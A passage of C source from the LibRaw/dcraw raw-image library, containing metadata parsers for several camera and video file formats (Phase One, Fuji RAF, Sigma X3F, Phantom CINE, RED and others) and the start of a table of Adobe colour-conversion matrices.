#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x10a9)
{
INT64 o = ftell(ifp);
fseek (ifp, (0x5<<1), SEEK_CUR);
Canon_WBpresets(0,0);
fseek(ifp,o,SEEK_SET);
}
if (type == 0x102d)
{
INT64 o = ftell(ifp);
Canon_CameraSettings();
fseek(ifp,o,SEEK_SET);
}
if (type == 0x580b)
{
if (strcmp(model,"Canon EOS D30")) sprintf(imgdata.shootinginfo.BodySerial, "%d", len);
else sprintf(imgdata.shootinginfo.BodySerial, "%0x-%05d", len>>16, len&0xffff);
}
#endif
if (type == 0x0032) {
if (len == 768) { /* EOS D30 */
fseek (ifp, 72, SEEK_CUR);
FORC4
{
ushort q = get2();
cam_mul[c ^ (c >> 1)] = q? 1024.0 / get2() : 1024;
}
if (!wbi) cam_mul[0] = -1; /* use my auto white balance */
} else if (!cam_mul[0]) {
if (get2() == key[0]) /* Pro1, G6, S60, S70 */
c = (strstr(model,"Pro1") ?
"012346000000000000":"01345:000000006008")[LIM(0,wbi,17)]-'0'+ 2;
else { /* G3, G5, S45, S50 */
c = "023457000000006000"[LIM(0,wbi,17)]-'0';
key[0] = key[1] = 0;
}
fseek (ifp, 78 + c*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2() ^ key[c & 1];
if (!wbi) cam_mul[0] = -1;
}
}
if (type == 0x10a9) { /* D60, 10D, 300D, and clones */
if (len > 66) wbi = "0134567028"[LIM(0,wbi,9)]-'0';
fseek (ifp, 2 + wbi*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
}
if (type == 0x1030 && wbi>=0 && (0x18040 >> wbi & 1))
ciff_block_1030(); /* all that don't have 0x10a9 */
if (type == 0x1031) {
raw_width = (get2(),get2());
raw_height = get2();
}
if (type == 0x501c) {
iso_speed = len & 0xffff;
}
if (type == 0x5029) {
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurFocal = len >> 16;
imgdata.lens.makernotes.FocalType = len & 0xffff;
if (imgdata.lens.makernotes.FocalType == 2) {
imgdata.lens.makernotes.CanonFocalUnits = 32;
if(imgdata.lens.makernotes.CanonFocalUnits>1)
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
focal_len = imgdata.lens.makernotes.CurFocal;
#else
focal_len = len >> 16;
if ((len & 0xffff) == 2) focal_len /= 32;
#endif
}
if (type == 0x5813) flash_used = int_to_float(len);
if (type == 0x5814) canon_ev = int_to_float(len);
if (type == 0x5817) shot_order = len;
if (type == 0x5834)
{
unique_id = len;
#ifdef LIBRAW_LIBRARY_BUILD
setCanonBodyFeatures(unique_id);
#endif
}
if (type == 0x580e) timestamp = len;
if (type == 0x180e) timestamp = get4();
#ifdef LOCALTIME
if ((type | 0x4000) == 0x580e)
timestamp = mktime (gmtime (&timestamp));
#endif
fseek (ifp, save, SEEK_SET);
}
}
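/*
Rollei d530flex files start with a plain-text "KEY=value" header;
read the dimensions, timestamp and thumbnail offset from it.
*/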
void CLASS parse_rollei()
{
char line[128], *val;
struct tm t;
fseek (ifp, 0, SEEK_SET);
memset (&t, 0, sizeof t);
do {
fgets (line, 128, ifp);
if ((val = strchr(line,'=')))
*val++ = 0;
else
val = line + strbuflen(line);
if (!strcmp(line,"DAT"))
sscanf (val, "%d.%d.%d", &t.tm_mday, &t.tm_mon, &t.tm_year);
if (!strcmp(line,"TIM"))
sscanf (val, "%d:%d:%d", &t.tm_hour, &t.tm_min, &t.tm_sec);
if (!strcmp(line,"HDR"))
thumb_offset = atoi(val);
if (!strcmp(line,"X "))
raw_width = atoi(val);
if (!strcmp(line,"Y "))
raw_height = atoi(val);
if (!strcmp(line,"TX "))
thumb_width = atoi(val);
if (!strcmp(line,"TY "))
thumb_height = atoi(val);
} while (strncmp(line,"EOHD",4));
data_offset = thumb_offset + thumb_width * thumb_height * 2;
t.tm_year -= 1900;
t.tm_mon -= 1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
strcpy (make, "Rollei");
strcpy (model,"d530flex");
write_thumb = &CLASS rollei_thumb;
}
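/*
Sinar IA files hold a little-endian table of named blocks
(META, THUMB, RAW0) followed by make/model and image dimensions.
*/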
void CLASS parse_sinar_ia()
{
int entries, off;
char str[8], *cp;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
entries = get4();
fseek (ifp, get4(), SEEK_SET);
while (entries--) {
off = get4(); get4();
fread (str, 8, 1, ifp);
if (!strcmp(str,"META")) meta_offset = off;
if (!strcmp(str,"THUMB")) thumb_offset = off;
if (!strcmp(str,"RAW0")) data_offset = off;
}
fseek (ifp, meta_offset+20, SEEK_SET);
fread (make, 64, 1, ifp);
make[63] = 0;
if ((cp = strchr(make,' '))) {
strcpy (model, cp+1);
*cp = 0;
}
raw_width = get2();
raw_height = get2();
load_raw = &CLASS unpacked_load_raw;
thumb_width = (get4(),get2());
thumb_height = get2();
write_thumb = &CLASS ppm_thumb;
maximum = 0x3fff;
}
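/*
Parse the Phase One ("Raw") tag table: geometry, black-level and
data-offset tags, plus (in LibRaw builds) body and lens metadata.
*/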
void CLASS parse_phase_one (int base)
{
unsigned entries, tag, type, len, data, save, i, c;
float romm_cam[3][3];
char *cp;
memset (&ph1, 0, sizeof ph1);
fseek (ifp, base, SEEK_SET);
order = get4() & 0xffff;
if (get4() >> 8 != 0x526177) return; /* "Raw" */
fseek (ifp, get4()+base, SEEK_SET);
entries = get4();
get4();
while (entries--) {
tag = get4();
type = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, base+data, SEEK_SET);
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0x0102:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
break;
case 0x0401:
if (type == 4) imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
else imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (getreal(type)/2.0f));
break;
case 0x0403:
if (type == 4) imgdata.lens.makernotes.CurFocal = int_to_float(data);
else imgdata.lens.makernotes.CurFocal = getreal(type);
break;
case 0x0410:
stmread(imgdata.lens.makernotes.body, len, ifp);
break;
case 0x0412:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x0414:
if (type == 4) {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0415:
if (type == 4) {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0416:
if (type == 4) {
imgdata.lens.makernotes.MinFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MinFocal = getreal(type);
}
if (imgdata.lens.makernotes.MinFocal > 1000.0f)
{
imgdata.lens.makernotes.MinFocal = 0.0f;
}
break;
case 0x0417:
if (type == 4) {
imgdata.lens.makernotes.MaxFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MaxFocal = getreal(type);
}
break;
#endif
case 0x100: flip = "0653"[data & 3]-'0'; break;
case 0x106:
for (i=0; i < 9; i++)
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.P1_color[0].romm_cam[i]=
#endif
((float *)romm_cam)[i] = getreal(11);
romm_coeff (romm_cam);
break;
case 0x107:
FORC3 cam_mul[c] = getreal(11);
break;
case 0x108: raw_width = data; break;
case 0x109: raw_height = data; break;
case 0x10a: left_margin = data; break;
case 0x10b: top_margin = data; break;
case 0x10c: width = data; break;
case 0x10d: height = data; break;
case 0x10e: ph1.format = data; break;
case 0x10f: data_offset = data+base; break;
case 0x110: meta_offset = data+base;
meta_length = len; break;
case 0x112: ph1.key_off = save - 4; break;
case 0x210: ph1.tag_210 = int_to_float(data); break;
case 0x21a: ph1.tag_21a = data; break;
case 0x21c: strip_offset = data+base; break;
case 0x21d: ph1.t_black = data; break;
case 0x222: ph1.split_col = data; break;
case 0x223: ph1.black_col = data+base; break;
case 0x224: ph1.split_row = data; break;
case 0x225: ph1.black_row = data+base; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x226:
for (i=0; i < 9; i++)
imgdata.color.P1_color[1].romm_cam[i] = getreal(11);
break;
#endif
case 0x301:
model[63] = 0;
fread (model, 1, 63, ifp);
if ((cp = strstr(model," camera"))) *cp = 0;
}
fseek (ifp, save, SEEK_SET);
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.lens.makernotes.body[0] && !imgdata.shootinginfo.BodySerial[0]) {
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
while (entries--) {
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x0407) {
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
}
fseek (ifp, save, SEEK_SET);
}
}
#endif
load_raw = ph1.format < 3 ?
&CLASS phase_one_load_raw : &CLASS phase_one_load_raw_c;
maximum = 0xffff;
strcpy (make, "Phase One");
if (model[0]) return;
switch (raw_height) {
case 2060: strcpy (model,"LightPhase"); break;
case 2682: strcpy (model,"H 10"); break;
case 4128: strcpy (model,"H 20"); break;
case 5488: strcpy (model,"H 25"); break;
}
}
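/*
Parse the Fuji RAF tag table: 0x100 raw size, 0x121 output size,
0x130 sensor layout, 0x131 X-Trans CFA pattern, 0x2ff0 white balance,
0xc000 crop size.
*/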
void CLASS parse_fuji (int offset)
{
unsigned entries, tag, len, save, c;
fseek (ifp, offset, SEEK_SET);
entries = get4();
if (entries > 255)
return;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_PARSEFUJI_PROCESSED;
#endif
while (entries--)
{
tag = get2();
len = get2();
save = ftell(ifp);
if (tag == 0x100) {
raw_height = get2();
raw_width = get2();
} else if (tag == 0x121) {
height = get2();
if ((width = get2()) == 4284) width += 3;
} else if (tag == 0x130) {
fuji_layout = fgetc(ifp) >> 7;
fuji_width = !(fgetc(ifp) & 8);
} else if (tag == 0x131) {
filters = 9;
FORC(36)
{
int q = fgetc(ifp);
xtrans_abs[0][35 - c] = MAX(0,MIN(q,2)); /* & 3;*/
}
} else if (tag == 0x2ff0) {
FORC4 cam_mul[c ^ 1] = get2();
}
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
else if (tag == 0x9650)
{
short a = (short)get2();
float b =fMAX(1.0f, get2());
imgdata.makernotes.fuji.FujiExpoMidPointShift = a / b;
} else if (tag == 0x2100) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ 1] = get2();
} else if (tag == 0x2200) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ 1] = get2();
} else if (tag == 0x2300) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ 1] = get2();
} else if (tag == 0x2301) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ 1] = get2();
} else if (tag == 0x2302) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ 1] = get2();
} else if (tag == 0x2310) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ 1] = get2();
} else if (tag == 0x2400) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ 1] = get2();
}
#endif
// IB end
else if (tag == 0xc000) {
c = order;
order = 0x4949;
if ((tag = get4()) > 10000) tag = get4();
if (tag > 10000) tag = get4();
width = tag;
height = get4();
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.posRAFData = save;
libraw_internal_data.unpacker_data.lenRAFData = (len>>1);
#endif
order = c;
}
fseek (ifp, save+len, SEEK_SET);
}
height <<= fuji_layout;
width >>= fuji_layout;
}
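/*
Walk the JPEG marker segments: take image dimensions from the SOF
marker, look for an embedded CIFF ("HEAP") block, and try to parse
a TIFF/EXIF directory inside each segment.
*/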
int CLASS parse_jpeg (int offset)
{
int len, save, hlen, mark;
fseek (ifp, offset, SEEK_SET);
if (fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) return 0;
while (fgetc(ifp) == 0xff && (mark = fgetc(ifp)) != 0xda) {
order = 0x4d4d;
len = get2() - 2;
save = ftell(ifp);
if (mark == 0xc0 || mark == 0xc3 || mark == 0xc9) {
fgetc(ifp);
raw_height = get2();
raw_width = get2();
}
order = get2();
hlen = get4();
if (get4() == 0x48454150
#ifdef LIBRAW_LIBRARY_BUILD
&& (save+hlen) >= 0 && (save+hlen)<=ifp->size()
#endif
) /* "HEAP" */
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (save+hlen, len-hlen, 0);
}
if (parse_tiff (save+6)) apply_tiff();
fseek (ifp, save+len, SEEK_SET);
}
return 1;
}
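/*
Recursively walk RIFF/AVI chunks, extracting a timestamp from
"nctg" and "IDIT" chunks.
*/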
void CLASS parse_riff()
{
unsigned i, size, end;
char tag[4], date[64], month[64];
static const char mon[12][4] =
{ "Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec" };
struct tm t;
order = 0x4949;
fread (tag, 4, 1, ifp);
size = get4();
end = ftell(ifp) + size;
if (!memcmp(tag,"RIFF",4) || !memcmp(tag,"LIST",4)) {
int maxloop = 1000;
get4();
while (ftell(ifp)+7 < end && !feof(ifp) && maxloop--)
parse_riff();
} else if (!memcmp(tag,"nctg",4)) {
while (ftell(ifp)+7 < end) {
i = get2();
size = get2();
if ((i+1) >> 1 == 10 && size == 20)
get_timestamp(0);
else fseek (ifp, size, SEEK_CUR);
}
} else if (!memcmp(tag,"IDIT",4) && size < 64) {
fread (date, 64, 1, ifp);
date[size] = 0;
memset (&t, 0, sizeof t);
if (sscanf (date, "%*s %s %d %d:%d:%d %d", month, &t.tm_mday,
&t.tm_hour, &t.tm_min, &t.tm_sec, &t.tm_year) == 6) {
for (i=0; i < 12 && strcasecmp(mon[i],month); i++);
t.tm_mon = i;
t.tm_year -= 1900;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
} else
fseek (ifp, size, SEEK_CUR);
}
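/*
Walk QuickTime atoms, recursing into moov/udta/CNTH containers and
parsing any CNDA atom as an embedded JPEG.
*/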
void CLASS parse_qt (int end)
{
unsigned save, size;
char tag[4];
order = 0x4d4d;
while (ftell(ifp)+7 < end) {
save = ftell(ifp);
if ((size = get4()) < 8) return;
if ((int)size < 0) return; // 2+GB is too much
if (save + size < save) return; // 32bit overflow
fread (tag, 4, 1, ifp);
if (!memcmp(tag,"moov",4) ||
!memcmp(tag,"udta",4) ||
!memcmp(tag,"CNTH",4))
parse_qt (save+size);
if (!memcmp(tag,"CNDA",4))
parse_jpeg (ftell(ifp));
fseek (ifp, save+size, SEEK_SET);
}
}
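/*
Parse the small header of SMaL camera files: version, data offset
and dimensions, then select the matching loader.
*/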
void CLASS parse_smal (int offset, int fsize)
{
int ver;
fseek (ifp, offset+2, SEEK_SET);
order = 0x4949;
ver = fgetc(ifp);
if (ver == 6)
fseek (ifp, 5, SEEK_CUR);
if (get4() != fsize) return;
if (ver > 6) data_offset = get4();
raw_height = height = get2();
raw_width = width = get2();
strcpy (make, "SMaL");
sprintf (model, "v%d %dx%d", ver, width, height);
if (ver == 6) load_raw = &CLASS smal_v6_load_raw;
if (ver == 9) load_raw = &CLASS smal_v9_load_raw;
}
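/*
Parse Phantom CINE headers: image geometry, CFA layout, timestamp,
white balance and shutter, then locate the selected frame.
*/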
void CLASS parse_cine()
{
unsigned off_head, off_setup, off_image, i;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
is_raw = get2() == 2;
fseek (ifp, 14, SEEK_CUR);
is_raw *= get4();
off_head = get4();
off_setup = get4();
off_image = get4();
timestamp = get4();
if ((i = get4())) timestamp = i;
fseek (ifp, off_head+4, SEEK_SET);
raw_width = get4();
raw_height = get4();
switch (get2(),get2()) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 16: load_raw = &CLASS unpacked_load_raw;
}
fseek (ifp, off_setup+792, SEEK_SET);
strcpy (make, "CINE");
sprintf (model, "%d", get4());
fseek (ifp, 12, SEEK_CUR);
switch ((i=get4()) & 0xffffff) {
case 3: filters = 0x94949494; break;
case 4: filters = 0x49494949; break;
default: is_raw = 0;
}
fseek (ifp, 72, SEEK_CUR);
switch ((get4()+3600) % 360) {
case 270: flip = 4; break;
case 180: flip = 1; break;
case 90: flip = 7; break;
case 0: flip = 2;
}
cam_mul[0] = getreal(11);
cam_mul[2] = getreal(11);
maximum = ~((~0u) << get4());
fseek (ifp, 668, SEEK_CUR);
shutter = get4()/1000000000.0;
fseek (ifp, off_image, SEEK_SET);
if (shot_select < is_raw)
fseek (ifp, shot_select*8, SEEK_CUR);
data_offset = (INT64) get4() + 8;
data_offset += (INT64) get4() << 32;
}
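/*
Parse RED REDCODE (R3D) footage: read the frame index from the file
tail when present, otherwise scan from the head for RED video chunks.
*/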
void CLASS parse_redcine()
{
unsigned i, len, rdvo;
order = 0x4d4d;
is_raw = 0;
fseek (ifp, 52, SEEK_SET);
width = get4();
height = get4();
fseek (ifp, 0, SEEK_END);
fseek (ifp, -(i = ftello(ifp) & 511), SEEK_CUR);
if (get4() != i || get4() != 0x52454f42) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Tail is missing, parsing from head...\n"), ifname);
#endif
fseek (ifp, 0, SEEK_SET);
while ((len = get4()) != EOF) {
if (get4() == 0x52454456)
if (is_raw++ == shot_select)
data_offset = ftello(ifp) - 8;
fseek (ifp, len-8, SEEK_CUR);
}
} else {
rdvo = get4();
fseek (ifp, 12, SEEK_CUR);
is_raw = get4();
fseeko (ifp, rdvo+8 + shot_select*4, SEEK_SET);
data_offset = get4();
}
}
//@end COMMON
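/*
Read a 16-bit-per-character string at the given offset and narrow it
to 8-bit characters.
*/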
char * CLASS foveon_gets (int offset, char *str, int len)
{
int i;
fseek (ifp, offset, SEEK_SET);
for (i=0; i < len-1; i++)
if ((str[i] = get2()) == 0) break;
str[i] = 0;
return str;
}
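/*
Parse Sigma X3F files: the section directory at the end of the file
lists IMAG/IMA2 (image data), CAMF (metadata) and PROP (name/value
properties such as make, model, ISO and exposure).
*/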
void CLASS parse_foveon()
{
int entries, img=0, off, len, tag, save, i, wide, high, pent, poff[256][2];
char name[64], value[64];
order = 0x4949; /* Little-endian */
fseek (ifp, 36, SEEK_SET);
flip = get4();
fseek (ifp, -4, SEEK_END);
fseek (ifp, get4(), SEEK_SET);
if (get4() != 0x64434553) return; /* SECd */
entries = (get4(),get4());
while (entries--) {
off = get4();
len = get4();
tag = get4();
save = ftell(ifp);
fseek (ifp, off, SEEK_SET);
if (get4() != (0x20434553 | (tag << 24))) return;
switch (tag) {
case 0x47414d49: /* IMAG */
case 0x32414d49: /* IMA2 */
fseek (ifp, 8, SEEK_CUR);
pent = get4();
wide = get4();
high = get4();
if (wide > raw_width && high > raw_height) {
switch (pent) {
case 5: load_flags = 1;
case 6: load_raw = &CLASS foveon_sd_load_raw; break;
case 30: load_raw = &CLASS foveon_dp_load_raw; break;
default: load_raw = 0;
}
raw_width = wide;
raw_height = high;
data_offset = off+28;
is_foveon = 1;
}
fseek (ifp, off+28, SEEK_SET);
if (fgetc(ifp) == 0xff && fgetc(ifp) == 0xd8
&& thumb_length < len-28) {
thumb_offset = off+28;
thumb_length = len-28;
write_thumb = &CLASS jpeg_thumb;
}
if (++img == 2 && !thumb_length) {
thumb_offset = off+24;
thumb_width = wide;
thumb_height = high;
write_thumb = &CLASS foveon_thumb;
}
break;
case 0x464d4143: /* CAMF */
meta_offset = off+8;
meta_length = len-28;
break;
case 0x504f5250: /* PROP */
pent = (get4(),get4());
fseek (ifp, 12, SEEK_CUR);
off += pent*8 + 24;
if ((unsigned) pent > 256) pent=256;
for (i=0; i < pent*2; i++)
((int *)poff)[i] = off + get4()*2;
for (i=0; i < pent; i++) {
foveon_gets (poff[i][0], name, 64);
foveon_gets (poff[i][1], value, 64);
if (!strcmp (name, "ISO"))
iso_speed = atoi(value);
if (!strcmp (name, "CAMMANUF"))
strcpy (make, value);
if (!strcmp (name, "CAMMODEL"))
strcpy (model, value);
if (!strcmp (name, "WB_DESC"))
strcpy (model2, value);
if (!strcmp (name, "TIME"))
timestamp = atoi(value);
if (!strcmp (name, "EXPTIME"))
shutter = atoi(value) / 1000000.0;
if (!strcmp (name, "APERTURE"))
aperture = atof(value);
if (!strcmp (name, "FLENGTH"))
focal_len = atof(value);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp (name, "CAMSERIAL"))
strcpy (imgdata.shootinginfo.BodySerial, value);
if (!strcmp (name, "FLEQ35MM"))
imgdata.lens.makernotes.FocalLengthIn35mmFormat = atof(value);
if (!strcmp (name, "LENSARANGE"))
{
char *sp;
imgdata.lens.makernotes.MaxAp4CurFocal = imgdata.lens.makernotes.MinAp4CurFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MinAp4CurFocal = atof(sp);
if (imgdata.lens.makernotes.MaxAp4CurFocal > imgdata.lens.makernotes.MinAp4CurFocal)
my_swap (float, imgdata.lens.makernotes.MaxAp4CurFocal, imgdata.lens.makernotes.MinAp4CurFocal);
}
}
if (!strcmp (name, "LENSFRANGE"))
{
char *sp;
imgdata.lens.makernotes.MinFocal = imgdata.lens.makernotes.MaxFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MaxFocal = atof(sp);
if ((imgdata.lens.makernotes.MaxFocal + 0.17f) < imgdata.lens.makernotes.MinFocal)
my_swap (float, imgdata.lens.makernotes.MaxFocal, imgdata.lens.makernotes.MinFocal);
}
}
if (!strcmp (name, "LENSMODEL"))
{
char *sp;
imgdata.lens.makernotes.LensID = strtol (value, &sp, 16); // atoi(value);
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = Sigma_X3F;
}
}
#endif
}
#ifdef LOCALTIME
timestamp = mktime (gmtime (&timestamp));
#endif
}
fseek (ifp, save, SEEK_SET);
}
}
//@out COMMON
/*
All matrices are from Adobe DNG Converter unless otherwise noted.
*/
void CLASS adobe_coeff (const char *t_make, const char *t_model
#ifdef LIBRAW_LIBRARY_BUILD
,int internal_only
#endif
)
{
static const struct {
const char *prefix;
int t_black, t_maximum, trans[12];
} table[] = {
{ "AgfaPhoto DC-833m", 0, 0, /* DJC */
{ 11438,-3762,-1115,-2409,9914,2497,-1227,2295,5300 } },
{ "Apple QuickTake", 0, 0, /* DJC */
{ 21392,-5653,-3353,2406,8010,-415,7166,1427,2078 } },
{"Broadcom RPi IMX219", 66, 0x3ff,
{ 5302,1083,-728,-5320,14112,1699,-863,2371,5136 } }, /* LibRaw */
{ "Broadcom RPi OV5647", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Canon EOS D2000", 0, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Canon EOS D6000", 0, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Canon EOS D30", 0, 0,
{ 9805,-2689,-1312,-5803,13064,3068,-2438,3075,8775 } },
{ "Canon EOS D60", 0, 0xfa0,
{ 6188,-1341,-890,-7168,14489,2937,-2640,3228,8483 } },
{ "Canon EOS 5DS", 0, 0x3c96,
{ 6250,-711,-808,-5153,12794,2636,-1249,2198,5610 } },
{ "Canon EOS 5D Mark IV", 0, 0,
{ 6446, -366, -864, -4436, 12204, 2513, -952, 2496, 6348 }},
{ "Canon EOS 5D Mark III", 0, 0x3c80,
{ 6722,-635,-963,-4287,12460,2028,-908,2162,5668 } },
{ "Canon EOS 5D Mark II", 0, 0x3cf0,
{ 4716,603,-830,-7798,15474,2480,-1496,1937,6651 } },
{ "Canon EOS 5D", 0, 0xe6c,
{ 6347,-479,-972,-8297,15954,2480,-1968,2131,7649 } },
{ "Canon EOS 6D", 0, 0x3c82,
{ 8621,-2197,-787,-3150,11358,912,-1161,2400,4836 } },
{ "Canon EOS 7D Mark II", 0, 0x3510,
{ 7268,-1082,-969,-4186,11839,2663,-825,2029,5839 } },
{ "Canon EOS 7D", 0, 0x3510,
{ 6844,-996,-856,-3876,11761,2396,-593,1772,6198 } },
{ "Canon EOS 80D", 0, 0,
{ 7457,-671,-937,-4849,12495,2643,-1213,2354,5492 } },
{ "Canon EOS 10D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 20Da", 0, 0,
{ 14155,-5065,-1382,-6550,14633,2039,-1623,1824,6561 } },
{ "Canon EOS 20D", 0, 0xfff,
{ 6599,-537,-891,-8071,15783,2424,-1983,2234,7462 } },
{ "Canon EOS 30D", 0, 0,
{ 6257,-303,-1000,-7880,15621,2396,-1714,1904,7046 } },
{ "Canon EOS 40D", 0, 0x3f60,
{ 6071,-747,-856,-7653,15365,2441,-2025,2553,7315 } },
{ "Canon EOS 50D", 0, 0x3d93,
{ 4920,616,-593,-6493,13964,2784,-1774,3178,7005 } },
{ "Canon EOS 60D", 0, 0x2ff7,
{ 6719,-994,-925,-4408,12426,2211,-887,2129,6051 } },
{ "Canon EOS 70D", 0, 0x3bc7,
{ 7034,-804,-1014,-4420,12564,2058,-851,1994,5758 } },
{ "Canon EOS 100D", 0, 0x350f,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 300D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 350D", 0, 0xfff,
{ 6018,-617,-965,-8645,15881,2975,-1530,1719,7642 } },
{ "Canon EOS 400D", 0, 0xe8e,
{ 7054,-1501,-990,-8156,15544,2812,-1278,1414,7796 } },
{ "Canon EOS 450D", 0, 0x390d,
{ 5784,-262,-821,-7539,15064,2672,-1982,2681,7427 } },
{ "Canon EOS 500D", 0, 0x3479,
{ 4763,712,-646,-6821,14399,2640,-1921,3276,6561 } },
{ "Canon EOS 550D", 0, 0x3dd7,
{ 6941,-1164,-857,-3825,11597,2534,-416,1540,6039 } },
{ "Canon EOS 600D", 0, 0x3510,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 650D", 0, 0x354d,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 750D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 760D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 700D", 0, 0x3c00,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 1000D", 0, 0xe43,
{ 6771,-1139,-977,-7818,15123,2928,-1244,1437,7533 } },
{ "Canon EOS 1100D", 0, 0x3510,
{ 6444,-904,-893,-4563,12308,2535,-903,2016,6728 } },
{ "Canon EOS 1200D", 0, 0x37c2,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 1300D", 0, 0x37c2,
{ 6939, -1016, -866, -4428, 12473, 2177, -1175, 2178, 6162 } },
{ "Canon EOS M3", 0, 0,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS M5", 0, 0, /* Adobe */
{ 8532, -701, -1167, -4095, 11879, 2508, -797, 2424, 7010 }},
{ "Canon EOS M10", 0, 0,
{ 6400,-480,-888,-5294,13416,2047,-1296,2203,6137 } },
{ "Canon EOS M", 0, 0,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS-1Ds Mark III", 0, 0x3bb0,
{ 5859,-211,-930,-8255,16017,2353,-1732,1887,7448 } },
{ "Canon EOS-1Ds Mark II", 0, 0xe80,
{ 6517,-602,-867,-8180,15926,2378,-1618,1771,7633 } },
{ "Canon EOS-1D Mark IV", 0, 0x3bb0,
{ 6014,-220,-795,-4109,12014,2361,-561,1824,5787 } },
{ "Canon EOS-1D Mark III", 0, 0x3bb0,
{ 6291,-540,-976,-8350,16145,2311,-1714,1858,7326 } },
{ "Canon EOS-1D Mark II N", 0, 0xe80,
{ 6240,-466,-822,-8180,15825,2500,-1801,1938,8042 } },
{ "Canon EOS-1D Mark II", 0, 0xe80,
